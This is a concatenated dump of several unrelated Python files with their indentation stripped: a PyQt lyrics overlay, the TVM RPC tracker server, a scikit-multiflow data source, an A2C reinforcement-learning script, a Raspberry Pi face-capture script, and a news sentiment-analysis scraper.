QtCore.Qt.WindowStaysOnTopHint |
QtCore.Qt.X11BypassWindowManagerHint)
else:
self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
self.setMinimumSize(600, 50)
self.resize(600, 60)
scn = QtGui.QApplication.desktop().screenNumber(
QtGui.QApplication.desktop().cursor().pos())
br = QtGui.QApplication.desktop().screenGeometry(scn).bottomRight()
frameGeo = self.frameGeometry()
frameGeo.moveBottomRight(br)
self.move(frameGeo.topLeft())
self.text = u"OSD Lyrics for Musicbox"
self.setWindowTitle("Lyrics")
self.show()
def mousePressEvent(self, event):
self.mpos = event.pos()
def mouseMoveEvent(self, event):
if (event.buttons() and QtCore.Qt.LeftButton):
diff = event.pos() - self.mpos
newpos = self.pos() + diff
self.move(newpos)
def wheelEvent(self, event):
self.resize(self.width() + event.delta(), self.height())
def paintEvent(self, event):
qp = QtGui.QPainter()
qp.begin(self)
self.drawText(event, qp)
qp.end()
def drawText(self, event, qp):
osdlyrics_color = config.get_item("osdlyrics_color")
osdlyrics_font = config.get_item("osdlyrics_font")
font = QtGui.QFont(osdlyrics_font[0], osdlyrics_font[1])
pen = QtGui.QColor(osdlyrics_color[0], osdlyrics_color[1],
osdlyrics_color[2])
qp.setFont(font)
qp.setPen(pen)
qp.drawText(event.rect(), QtCore.Qt.AlignCenter |
QtCore.Qt.TextWordWrap, self.text)
class LyricsAdapter(QtDBus.QDBusAbstractAdaptor):
QtCore.Q_CLASSINFO("D-Bus Interface", "local.musicbox.Lyrics")
QtCore.Q_CLASSINFO(
"D-Bus Introspection",
' <interface name="local.musicbox.Lyrics">\n'
' <method name="refresh_lyrics">\n'
' <arg direction="in" type="s" name="lyric"/>\n'
' </method>\n'
' </interface>\n')
def __init__(self, parent):
super(LyricsAdapter, self).__init__(parent)
@QtCore.pyqtSlot(str)
def refresh_lyrics(self, text):
self.parent().text = text
self.parent().repaint()
def show_lyrics():
app = QtGui.QApplication(sys.argv)
lyrics = Lyrics()
QtDBus.QDBusConnection.sessionBus().registerService('org.musicbox.Bus')
QtDBus.QDBusConnection.sessionBus().registerObject('/', lyrics)
sys.exit(app.exec_())
def show_lyrics_new_process():
if pyqt_activity and config.get_item("osdlyrics"):
p = Process(target=show_lyrics)
p.daemon = True
p.start()
|
tracker.py
|
"""RPC Tracker, tracks and distributes the TVM RPC resources.
This folder implemements the tracker server logic.
Note
----
Tracker is a TCP based rest api with the following protocol:
- Initial handshake to the peer
- RPC_TRACKER_MAGIC
- Normal message: [size(int32), json-data]
- Each message is initiated by the client, and the tracker replies with a json.
List of available APIs:
- PING: check if tracker is alive
- input: [TrackerCode.PING]
- return: TrackerCode.SUCCESS
- PUT: report resource to tracker
- input: [TrackerCode.PUT, [port, match-key]]
- return: TrackerCode.SUCCESS
- note: match-key is a randomly generated identify the resource during connection.
- REQUEST: request a new resource from tracker
- input: [TrackerCode.REQUEST, [key, user, priority]]
- return: [TrackerCode.SUCCESS, [url, port, match-key]]
"""
import heapq
import time
import logging
import socket
import multiprocessing
import errno
import struct
import json
try:
from tornado import ioloop
from . import tornado_util
except ImportError as error_msg:
raise ImportError(
"RPCTracker module requires tornado package %s" % error_msg)
from ..._ffi.base import py_str
from . import base
from .base import RPC_TRACKER_MAGIC, TrackerCode
class Scheduler(object):
"""Abstratc interface of scheduler."""
def put(self, value):
"""Push a resource into the scheduler.
This function can trigger callbacks in the scheduler.
Parameters
----------
value : object
The resource to be put in the scheduler.
"""
raise NotImplementedError()
def request(self, user, priority, callback):
"""Request a resource.
Parameters
----------
user : str
The user who is requesting the resource.
priority : int
The job priority
callback : function: value->bool
Callback function to receive an resource when ready
returns True if the resource is consumed.
"""
raise NotImplementedError()
def summary(self):
"""Get summary information of the scheduler."""
raise NotImplementedError()
class PriorityScheduler(Scheduler):
"""Priority based scheduler, FIFO based on time"""
def __init__(self, key):
self._key = key
self._values = []
self._requests = []
def _schedule(self):
while self._requests and self._values:
value = self._values.pop(0)
item = heapq.heappop(self._requests)
callback = item[-1]
if callback(value[1:]):
value[0].pending_matchkeys.remove(value[-1])
else:
self._values.append(value)
def put(self, value):
self._values.append(value)
self._schedule()
def request(self, user, priority, callback):
heapq.heappush(self._requests, (-priority, time.time(), callback))
self._schedule()
def summary(self):
"""Get summary information of the scheduler."""
return {"free": len(self._values),
"pending": len(self._requests)}
class TCPEventHandler(tornado_util.TCPHandler):
"""Base asynchronize message handler.
The tracker and client follows a simple message protocol.
The message is in form [nbytes(int32)] [json-str].
All the information is packed in json-str
"""
def __init__(self, tracker, sock, addr):
super(TCPEventHandler, self).__init__(sock)
self._data = bytearray()
self._tracker = tracker
self._msg_size = 0
self._addr = addr
self._init_req_nbytes = 4
self._info = {"addr": addr}
# list of pending match keys that has not been used.
self.pending_matchkeys = set()
self._tracker._connections.add(self)
def name(self):
"""name of connection"""
return "TCPSocket: %s" % str(self._addr)
def summary(self):
"""Summary of this connection"""
return self._info
def _init_conn(self, message):
"""Initialie the connection"""
if len(message) != 4:
logging.info("Invalid connection from %s", self.name())
self.close()
magic = struct.unpack('@i', message)[0]
if magic != RPC_TRACKER_MAGIC:
logging.info("Invalid magic from %s", self.name())
self.close()
self.write_message(struct.pack('@i', RPC_TRACKER_MAGIC), binary=True)
self._init_req_nbytes = 0
def on_message(self, message):
"""Callback when a message is received.
Parameters
----------
message : bytearray
The bytes received
"""
assert isinstance(message, bytes)
if self._init_req_nbytes:
self._init_conn(message)
return
self._data += message
while True:
if self._msg_size == 0:
if len(self._data) >= 4:
self._msg_size = struct.unpack('@i', self._data[:4])[0]
else:
return
if self._msg_size != 0 and len(self._data) >= self._msg_size + 4:
msg = py_str(bytes(self._data[4:4 + self._msg_size]))
del self._data[:4 + self._msg_size]
self._msg_size = 0
# pylint: disable=broad-except
self.call_handler(json.loads(msg))
else:
return
def ret_value(self, data):
"""return value to the output"""
data = json.dumps(data)
self.write_message(
struct.pack('@i', len(data)), binary=True)
self.write_message(data.encode("utf-8"), binary=True)
def call_handler(self, args):
"""Event handler when json request arrives."""
code = args[0]
if code == TrackerCode.PUT:
key = args[1]
port, matchkey = args[2]
self.pending_matchkeys.add(matchkey)
self._tracker.put(key, (self, self._addr[0], port, matchkey))
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.REQUEST:
key = args[1]
user = args[2]
priority = args[3]
def _cb(value):
# if the connection is already closed
if not self._sock:
return False
try:
self.ret_value([TrackerCode.SUCCESS, value])
except (socket.error, IOError):
return False
return True
self._tracker.request(key, user, priority, _cb)
elif code == TrackerCode.PING:
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.GET_PENDING_MATCHKEYS:
self.ret_value(list(self.pending_matchkeys))
elif code == TrackerCode.STOP:
# safe stop tracker
if self._tracker._stop_key == args[1]:
self.ret_value(TrackerCode.SUCCESS)
self._tracker.stop()
else:
self.ret_value(TrackerCode.FAIL)
elif code == TrackerCode.UPDATE_INFO:
self._info.update(args[1])
self.ret_value(TrackerCode.SUCCESS)
elif code == TrackerCode.SUMMARY:
status = self._tracker.summary()
self.ret_value([TrackerCode.SUCCESS, status])
else:
logging.info("Unknown tracker code %d", code)
self.close()
def on_close(self):
self._tracker._connections.remove(self)
def on_error(self, err):
logging.info("%s: Error in RPC Tracker: %s", self.name(), err)
self.close()
class TrackerServerHandler(object):
"""Tracker that tracks the resources."""
def __init__(self, sock, stop_key):
self._scheduler_map = {}
self._sock = sock
self._sock.setblocking(0)
self._ioloop = ioloop.IOLoop.current()
self._stop_key = stop_key
self._connections = set()
def _event_handler(_, events):
self._on_event(events)
self._ioloop.add_handler(
self._sock.fileno(), _event_handler, self._ioloop.READ)
def _on_event(self, _):
while True:
try:
conn, addr = self._sock.accept()
TCPEventHandler(self, conn, addr)
except socket.error as err:
if err.args[0] in (errno.EAGAIN, errno.EWOULDBLOCK):
break
def create_scheduler(self, key):
"""Create a new scheduler."""
return PriorityScheduler(key)
def put(self, key, value):
"""Report a new resource to the tracker."""
if key not in self._scheduler_map:
self._scheduler_map[key] = self.create_scheduler(key)
self._scheduler_map[key].put(value)
def request(self, key, user, priority, callback):
"""Request a new resource."""
if key not in self._scheduler_map:
self._scheduler_map[key] = self.create_scheduler(key)
self._scheduler_map[key].request(user, priority, callback)
def stop(self):
"""Safely stop tracker."""
for conn in list(self._connections):
conn.close()
self._sock.close()
self._ioloop.stop()
def summary(self):
"""Return a dict summarizing current status."""
qinfo = {}
for k, v in self._scheduler_map.items():
qinfo[k] = v.summary()
cinfo = []
# ignore client connections without key
for conn in self._connections:
res = conn.summary()
if res.get("key", "").startswith("server"):
cinfo.append(res)
return {"queue_info": qinfo, "server_info": cinfo}
def run(self):
"""Run the tracker server"""
self._ioloop.start()
def _tracker_server(listen_sock, stop_key):
handler = TrackerServerHandler(listen_sock, stop_key)
handler.run()
logging.info("Tracker Stop signal received, terminating...")
class Tracker(object):
"""Start RPC tracker on a seperate process.
Python implementation based on multi-processing.
Parameters
----------
host : str
The host url of the server.
port : int
The TCP port to be bind to
port_end : int, optional
The end TCP port to search
"""
def __init__(self,
host,
port=9190,
port_end=9199):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = None
self.stop_key = base.random_key("tracker")
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [98, 48]:
continue
else:
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
logging.info("RPCTracker: bind to %s:%d", host, self.port)
sock.listen(1)
self.proc = multiprocessing.Process(
target=_tracker_server, args=(sock, self.stop_key))
self.proc.start()
self.host = host
# close the socket on this process
sock.close()
def _stop_tracker(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
sock.sendall(struct.pack("@i", base.RPC_TRACKER_MAGIC))
magic = struct.unpack("@i", base.recvall(sock, 4))[0]
assert magic == base.RPC_TRACKER_MAGIC
base.sendjson(sock, [TrackerCode.STOP, self.stop_key])
assert base.recvjson(sock) == TrackerCode.SUCCESS
sock.close()
def terminate(self):
"""Terminate the server process"""
if self.proc:
if self.proc.is_alive():
self._stop_tracker()
self.proc.join(1)
if self.proc.is_alive():
logging.info("Terminating Tracker Server...")
self.proc.terminate()
self.proc = None
def __del__(self):
self.terminate()
|
generator_data_source.py
|
from skmultiflow.data.source.data_source import DataSource
import threading
class GeneratorDataSource(DataSource):
""" GeneratorDataSource class.
Provides a DataSource implementation, pulling data from a generator.
Examples
--------
>>> import time
>>> from skmultiflow.data.generator.sea_generator import SEAGenerator
>>> from skmultiflow.data.source.generator_data_source import GeneratorDataSource
>>> from skmultiflow.data.observer.buffer_data_event_observer import BufferDataEventObserver
>>>
>>>
>>> def record_to_dictionary(record):
>>> if record is None:
>>> return None
>>> return {'X': record[0], 'y': record[1]}
>>>
>>>
>>> # Setup an event observer and a data source
>>> sea_generator = SEAGenerator(classification_function=2, random_state=112, balance_classes=False, noise_percentage=0.28)
>>> buffer_data_event_observer = BufferDataEventObserver()
>>> data_source = GeneratorDataSource(record_to_dictionary, [buffer_data_event_observer], sea_generator)
>>> data_source.listen_for_events()
>>>
>>> # Wait until first event is received
>>> while(len(buffer_data_event_observer.get_buffer())==0):
>>> time.sleep(0.100) # 100ms
>>>
>>> first_event = buffer_data_event_observer.get_buffer()[0]
>>> print('First event: X: {}, y: {}'.format(first_event['X'], first_event['y']))
"""
def __init__(self, record_to_dictionary, observers, generator):
super().__init__(record_to_dictionary, observers)
self.generator = generator
self.name = "GeneratorDataSource: {}".format(self.generator.name)
def _prepare_for_use(self):
pass
def _prepare_for_use(self):
""" Prepares the data source to be used
"""
pass
def listen_for_events(self):
thread = threading.Thread(target=self.consume_generator_messages, args=())
thread.daemon = True
thread.start()
def consume_generator_messages(self):
event = self.generator.next_sample()
while event is not None:
self.on_new_event(event)
event = self.generator.next_sample()
|
naiveA2C.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
# @Time : 2021/8/4 11:02 下午
# @Author : tinyzqh
# @Email : tinyzqh@163.com
# @File : naiveA2C.py
"""
import gym
import argparse
import torch
import numpy as np
import torch.nn as nn
import torch.optim as optim
from torch.distributions import Categorical
import matplotlib.pyplot as plt
from multiprocessing import Process, Pipe
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class VecEnv(object):
"""
An abstract asynchronous, vectorized environment.
# This code is from openai baseline
# https://github.com/openai/baselines/tree/master/baselines/common/vec_env
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
self.step_async(actions)
return self.step_wait()
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
def make_env(args):
def _thunk():
env = gym.make(args.env_name)
return env
return _thunk
class ActorCritic(nn.Module):
def __init__(self, num_inputs, num_outputs, hidden_size, std=0.0):
super(ActorCritic, self).__init__()
self.critic = nn.Sequential(
nn.Linear(num_inputs, hidden_size),
nn.ReLU(),
nn.Linear(hidden_size, 1)
)
self.actor = nn.Sequential(
nn.Linear(num_inputs, hidden_size),
nn.ReLU(),
nn.Linear(hidden_size, num_outputs),
nn.Softmax(dim=1),
)
def forward(self, x):
value = self.critic(x)
probs = self.actor(x)
dist = Categorical(probs)
return dist, value
def test_env(args, vis=False):
env = gym.make(args.env_name) # a single env
state = env.reset()
if vis: env.render()
done = False
total_reward = 0
while not done:
state = torch.FloatTensor(state).unsqueeze(0).to(device)
dist, _ = model(state)
next_state, reward, done, _ = env.step(dist.sample().cpu().numpy()[0])
state = next_state
if vis: env.render()
total_reward += reward
return total_reward
def compute_returns(next_value, rewards, masks, gamma=0.99):
R = next_value
returns = []
for step in reversed(range(len(rewards))):
R = rewards[step] + gamma * R * masks[step]
returns.insert(0, R)
return returns
def plot(epoch, rewards):
plt.plot(rewards, 'b-')
plt.title('frame %s. reward: %s' % (epoch, rewards[-1]))
plt.pause(0.0001)
class Agent(object):
def __init__(self, env, exp_buffer, args):
super(Agent, self).__init__()
def build_model(self):
pass
def learn(self):
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="the parameter of a2c")
parser.add_argument('--hidden_size', type=int, help="maximum capacity of the buffer", default=256)
parser.add_argument('--lr', type=float, help='learning rate used in the Adam optimizer', default=1e-3)
parser.add_argument('--num_steps', type=int, help="the num of rollout", default=5)
parser.add_argument("--env_name", default="CartPole-v0") # OpenAI gym environment name
parser.add_argument("--num_envs", type=int, default=8) # OpenAI gym environment name
arg = parser.parse_args()
plt.ion()
envs = [make_env(arg) for i in range(arg.num_envs)]
envs = SubprocVecEnv(envs) # 8 env
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = ActorCritic(envs.observation_space.shape[0], envs.action_space.n, arg.hidden_size).to(device)
optimizer = optim.Adam(model.parameters())
test_rewards = []
state = envs.reset()
for epoch in range(20000):
log_probs = []
values = []
rewards = []
masks = []
entropy = 0
for _ in range(arg.num_steps): # rollout trajectory
state = torch.FloatTensor(state).to(device)
dist, value = model(state)
action = dist.sample()
next_state, reward, done, _ = envs.step(action.cpu().numpy())
log_prob = dist.log_prob(action)
entropy += dist.entropy().mean()
log_probs.append(log_prob)
values.append(value)
rewards.append(torch.FloatTensor(reward).unsqueeze(1).to(device))
masks.append(torch.FloatTensor(1 - done).unsqueeze(1).to(device))
state = next_state
if epoch % 100 == 0:
test_rewards.append(np.mean([test_env(args=arg) for _ in range(10)]))
plot(epoch, test_rewards)
next_state = torch.FloatTensor(next_state).to(device)
_, next_value = model(next_state)
returns = compute_returns(next_value, rewards, masks)
log_probs = torch.cat(log_probs)
returns = torch.cat(returns).detach()
values = torch.cat(values)
advantage = returns - values
actor_loss = -(log_probs * advantage.detach()).mean()
critic_loss = advantage.pow(2).mean()
loss = actor_loss + 0.5 * critic_loss - 0.001 * entropy
optimizer.zero_grad()
loss.backward()
optimizer.step()
# test_env(True)
|
acquire_faces.py
|
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
import numpy as np
import os
import multiprocessing
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
def detect_faces(image, frames_passed_in_session, output):
gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(image, scaleFactor=1.2, minNeighbors=4, minSize=(60,60), maxSize=(300, 300))
face_num=0
for (x, y, w, h) in faces:
print("face found!")
face_roi = image[y:y+h, x:x+w]
date_time_face_id = time.strftime('%d-%m-%Y-%H:%M:%S_')
image_filename = date_time_face_id + str(frames_passed_in_session) + "_" + str(face_num) + ".png"
cv2.imwrite(image_filename, face_roi)
face_num += 1
output.put(None)
def main():
camera = PiCamera()
resolution = ((1280, 720)) #(640, 480) (1920, 1080)
fps = 10
camera.resolution = resolution
camera.framerate = fps
rawCapture = PiRGBArray(camera, size=resolution)
time.sleep(0.1)
background_image = None
frames_passed_in_session = 0
num_frames_set_bg = 25
images_from_segment = []
output = multiprocessing.Queue()
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
image = frame.array
gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
smooth_gray_image = cv2.GaussianBlur(gray_image, (3, 3), 0)
float_smooth_gray_image = np.float32(smooth_gray_image)
if frames_passed_in_session == 0:
background_image = float_smooth_gray_image
else:
cv2.accumulateWeighted(float_smooth_gray_image, background_image, 0.1)
background_difference = cv2.absdiff(float_smooth_gray_image, background_image)
mask_difference = cv2.bitwise_and(background_difference, background_image)
abs_mask_difference = np.uint8(mask_difference)
frames_passed_in_session += 1
if frames_passed_in_session > num_frames_set_bg: # time delay for bg to average
ret, thresh = cv2.threshold(abs_mask_difference, 50, 255, cv2.THRESH_BINARY)
num_pixels_different = np.sum(thresh)
print (num_pixels_different)
if num_pixels_different > 10000:
#os.system("espeak 'Movement Detected!'")
images_from_segment.append((frames_passed_in_session, image))
else:
print (frames_passed_in_session)
if frames_passed_in_session > num_frames_set_bg and frames_passed_in_session % fps == 0:
print('working')
processes = [multiprocessing.Process(target=detect_faces, args=(each_image, i, output)) for i, each_image in images_from_segment]
for p in processes:
p.start()
for p in processes:
p.join()
results = [output.get() for p in processes]
images_from_segment = []
#cv2.imshow("Frame", abs_mask_difference)
#key = cv2.waitKey(1) & 0xFF
rawCapture.truncate(0)
#if key == ord("q"):
#break
if __name__ == "__main__":
main()
|
function.py
|
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['CUDA_VISIBLE_DEVICES'] = ''
import nltk
nltk.data.path.append('/home/husein/nltk_data')
from rnn import *
from setting import *
from bs4 import BeautifulSoup
import requests
import re
from queue import Queue
import threading
import pickle
import numpy as np
import spacy
import pandas as pd
from unidecode import unidecode
import itertools
from fake_useragent import UserAgent
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from datetime import datetime, timedelta
from dateutil import parser
from newspaper import Article
import networkx as nx
import networkx.drawing.layout as nxlayout
import plotly.graph_objs as go
from sklearn.feature_extraction.text import TfidfVectorizer
english_stopwords = stopwords.words('english')
nlp = spacy.load('en_core_web_md')
GOOGLE_NEWS_URL = 'https://www.google.com.my/search?q={}&source=lnt&tbm=nws&start={}'
def forge_url(q, start):
return GOOGLE_NEWS_URL.format(q.replace(' ', '+'), start)
ua = UserAgent()
hdr = {'User-Agent': ua.chrome}
def getsentiment(sentences):
batch_x = np.zeros((len(sentences), SENTIMENT_LEN, DIMENSION))
for i, sentence in enumerate(sentences):
tokens = sentence.split()[:SENTIMENT_LEN]
for no, text in enumerate(tokens[::-1]):
try:
batch_x[i, -1 - no, :] += sentiment_vector[sentiment_dict[text], :]
except:
continue
return sentiment_sess.run(tf.nn.softmax(sentiment_model.logits), feed_dict = {sentiment_model.X : batch_x})
def getemotion(sentences):
batch_x = np.zeros((len(sentences), EMOTION_LEN, DIMENSION))
for i, sentence in enumerate(sentences):
tokens = sentence.split()[:EMOTION_LEN]
for no, text in enumerate(tokens[::-1]):
try:
batch_x[i, -1 - no, :] += emotion_vector[emotion_dict[text], :]
except:
continue
return emotion_sess.run(tf.nn.softmax(emotion_model.logits), feed_dict = {emotion_model.X : batch_x})
def getmsg(sentences):
batch_x = np.zeros((len(sentences), MESSAGE_LEN, DIMENSION))
for i, sentence in enumerate(sentences):
tokens = sentence.split()[:MESSAGE_LEN]
for no, text in enumerate(tokens[::-1]):
try:
batch_x[i, -1 - no, :] += message_vector[message_dict[text], :]
except:
continue
return message_sess.run(tf.nn.softmax(message_model.logits), feed_dict = {message_model.X : batch_x})
def getpolar(sentences):
batch_polarity = np.zeros((len(sentences), POLARITY_LEN, DIMENSION))
batch_subjectivity = np.zeros((len(sentences), SUBJECTIVITY_LEN, DIMENSION))
batch_irony = np.zeros((len(sentences), IRONY_LEN, DIMENSION))
batch_bias = np.zeros((len(sentences), BIAS_LEN, DIMENSION))
for i, sentence in enumerate(sentences):
tokens = sentence.split()[:BIAS_LEN]
for no, text in enumerate(tokens[::-1]):
try:
batch_polarity[i, -1 - no, :] += polarity_vector[polarity_dict[text], :]
except:
pass
try:
batch_subjectivity[i, -1 - no, :] += subjectivity_vector[subjectivity_dict[text], :]
except:
pass
try:
batch_irony[i, -1 - no, :] += irony_vector[irony_dict[text], :]
except:
pass
try:
batch_bias[i, -1 - no, :] += bias_vector[bias_dict[text], :]
except:
pass
output_subjectivity = subjectivity_sess.run(tf.nn.softmax(subjectivity_model.logits), feed_dict = {subjectivity_model.X : batch_subjectivity})
output_polarity = polarity_sess.run(tf.nn.softmax(polarity_model.logits), feed_dict = {polarity_model.X : batch_polarity})
output_irony = irony_sess.run(tf.nn.softmax(irony_model.logits), feed_dict = {irony_model.X : batch_irony})
output_bias = bias_sess.run(tf.nn.softmax(bias_model.logits), feed_dict = {bias_model.X : batch_bias})
argmax_subjectivity = np.argmax(output_subjectivity, axis = 1)
argmax_subjectivity[np.where(argmax_subjectivity == 0)[0]] = -1
argmax_polarity = np.argmax(output_polarity, axis = 1)
argmax_polarity[np.where(argmax_polarity == 0)[0]] = -1
argmax_irony = np.argmax(output_irony, axis = 1)
argmax_irony[np.where(argmax_irony == 0)[0]] = -1
argmax_bias = np.argmax(output_bias, axis = 1)
argmax_bias[np.where(argmax_bias == 0)[0]] = -1
return ((np.max(output_subjectivity, axis = 1) - 0.5) / 0.5) * argmax_subjectivity,((np.max(output_polarity, axis = 1) - 0.5) / 0.5) * argmax_polarity,((np.max(output_irony, axis = 1) - 0.5) / 0.5) * argmax_irony,((np.max(output_bias, axis = 1) - 0.5) / 0.5) * argmax_bias
def run_parallel_in_threads(target, args_list):
globalparas = []
result = Queue()
def task_wrapper(*args):
result.put(target(*args))
threads = [threading.Thread(target = task_wrapper, args = args) for args in args_list]
for t in threads:
t.start()
for t in threads:
t.join()
while not result.empty():
globalparas.append(result.get())
globalparas = list(filter(None, globalparas))
return globalparas
def textcleaning(string):
string = unidecode(string)
string = re.sub('[^\'\"A-Za-z0-9\- ]+', '', string)
string = word_tokenize(string)
string = filter(None, string)
string = [y.strip() for y in string]
string = ' '.join(string)
return string
def classifiercleaning(string):
string = unidecode(string)
string = re.sub('[^A-Za-z ]+', '', string)
string = word_tokenize(string)
string = filter(None, string)
string = [y.strip() for y in string]
string = [y for y in string if len(y) > 2 and y.find('nbsp') < 0 and y.find('href') < 0 and y not in english_stopwords]
string = ' '.join(string).lower()
return ''.join(''.join(s)[:2] for _, s in itertools.groupby(string))
def extract_links(content):
soup = BeautifulSoup(content, 'html.parser')
today = datetime.now().strftime("%m/%d/%Y")
links_list = [v.attrs['href'] for v in soup.find_all('a', {'class': ['lLrAF']})]
dates_list = [v.text for v in soup.find_all('div', {'class': ['slp']})]
output = []
for (link, date) in zip(links_list, dates_list):
date = date.split('-')
if date[1].find('hours') > 0 or date[1].find('minute') > 0:
date[1] = today
elif date[1].find('day') > 0:
count = date[1].split(' ')[0]
else:
try:
date[1] = parser.parse(date[1]).strftime("%m-%d-%Y")
except:
date[1] = 'null'
output.append((link, date[0].strip(), date[1],))
return output
def getlink(value, token = 'free'):
url = forge_url(value, 0)
response = requests.get(url, headers=hdr, timeout=20)
links = extract_links(response.content)
if token == 'free':
return links[:5]
else:
return links
def getP(link, news, date):
article = Article(link)
article.download()
article.parse()
soup = BeautifulSoup(article.html, 'html.parser')
articles = [v.text for v in soup.find_all('p')]
paras, paras_classifier = [], []
for p in articles:
if len(p.split()) > 10:
paras.append(textcleaning(p))
paras_classifier.append(classifiercleaning(p))
return {'url': link,'p': paras,'p-classifier':paras_classifier,'news':news, 'date':date,'title':article.title}
def filterP(links):
outputs = run_parallel_in_threads(getP, links)
overall_emotion, overall_sentiment, overall_subj, overall_pol, overall_irony, overall_msg, overall_bias = [], [], [], [], [], [], []
overall_local_entities_nouns = []
persons, orgs, gpes = [], [], []
df_texts, df_sentiments = [], []
for i in range(len(outputs)):
local_entities_nouns, local_persons, local_orgs, local_gpes = [], [], [], []
for sentence in outputs[i]['p']:
for token in nlp(sentence):
if token.ent_type_ == 'PERSON':
local_persons.append(str(token))
if token.ent_type_ == 'ORG':
local_orgs.append(str(token))
if token.ent_type_ == 'GPE':
local_gpes.append(str(token))
if (len(token.ent_type_) > 0 or token.tag_ in ['NNP','NN']) and str(token).lower() not in english_stopwords:
local_entities_nouns.append(str(token))
sentiments = getsentiment(outputs[i]['p-classifier'])
df_sentiments += np.argmax(sentiments,axis=1).tolist()
df_texts += outputs[i]['p-classifier']
emotions = getemotion(outputs[i]['p-classifier'])
msgs = getmsg(outputs[i]['p-classifier'])
subjectivities, polarities, ironies, biases = getpolar(outputs[i]['p-classifier'])
overall_local_entities_nouns += local_entities_nouns
persons += local_persons
orgs += local_orgs
gpes += local_gpes
local_entities_nouns_unique, local_entities_nouns_count = np.unique(local_entities_nouns,return_counts=True)
sorted_val = local_entities_nouns_unique[np.argsort(local_entities_nouns_count)[::-1]].tolist()
outputs[i]['tokens'] = sorted_val[:15]
outputs[i]['sentiment'] = sentiments.tolist()
outputs[i]['emotion'] = emotions.tolist()
outputs[i]['msg'] = msgs.tolist()
outputs[i]['subjectivity'] = subjectivities.tolist()
outputs[i]['polarity'] = polarities.tolist()
outputs[i]['irony'] = ironies.tolist()
outputs[i]['bias'] = biases.tolist()
outputs[i]['person'] = list(set(local_persons))
outputs[i]['org'] = list(set(local_orgs))
outputs[i]['gpes'] = list(set(local_gpes))
avg_sentiment = sentiments.mean(axis = 0)
avg_emotion = emotions.mean(axis = 0)
avg_msg = msgs.mean(axis = 0)
avg_subjectivity = subjectivities.mean()
avg_polarity = polarities.mean()
avg_irony = ironies.mean()
avg_bias = biases.mean()
overall_emotion.append(avg_emotion)
overall_sentiment.append(avg_sentiment)
overall_msg.append(avg_msg)
overall_subj.append(avg_subjectivity)
overall_pol.append(avg_polarity)
overall_irony.append(avg_irony)
overall_bias.append(avg_bias)
outputs[i]['avg_sentiment'] = avg_sentiment.tolist()
outputs[i]['avg_emotion'] = avg_emotion.tolist()
outputs[i]['avg_msg'] = avg_msg.tolist()
outputs[i]['avg_subjectivity'] = avg_subjectivity.tolist()
outputs[i]['avg_polarity'] = avg_polarity.tolist()
